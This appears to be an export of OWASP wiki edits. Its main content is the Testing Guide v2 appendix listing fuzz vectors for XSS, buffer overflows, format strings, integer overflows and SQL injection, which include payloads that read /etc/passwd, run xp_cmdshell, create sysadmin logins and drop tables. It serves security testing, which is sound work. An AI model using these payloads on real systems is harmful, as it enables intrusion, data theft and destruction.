&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/00000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/11000fff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/ffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Project&amp;diff=13338</id>
		<title>Category:OWASP Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Project&amp;diff=13338"/>
				<updated>2006-11-19T23:26:38Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Alpha Status Projects */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;An OWASP project is a collection of related tasks that have a defined roadmap and team members. OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team.&lt;br /&gt;
&lt;br /&gt;
To propose a new project, please send an email to [mailto:owasp@owasp.org?subject=New_OWASP_Project_idea owasp@owasp.org]&lt;br /&gt;
&lt;br /&gt;
Every project has an associated mail list. You can view all the lists, examine their archives, and subscribe to any of them on the [http://lists.owasp.org/mailman/listinfo OWASP Project Mailing Lists] page.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release Quality Projects==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th width=&amp;quot;50%&amp;quot;&amp;gt;Tools&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Documentation&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]]&lt;br /&gt;
: an online training environment for hands-on learning about application security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WebScarab Project|OWASP WebScarab Project]]&lt;br /&gt;
: a tool for performing all types of security testing on web applications and web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP AppSec FAQ Project|OWASP AppSec FAQ Project]]&lt;br /&gt;
: FAQ covering many application security topics&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Guide Project|OWASP Guide Project]]&lt;br /&gt;
: a massive document covering all aspects of web application and web service security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Legal Project|OWASP Legal Research]]&lt;br /&gt;
: a project focused on contracting for secure software&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Top Ten Project|OWASP Top Ten Project]]&lt;br /&gt;
: an awareness document that describes the top ten web application security vulnerabilities&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Beta Status Projects==&lt;br /&gt;
&lt;br /&gt;
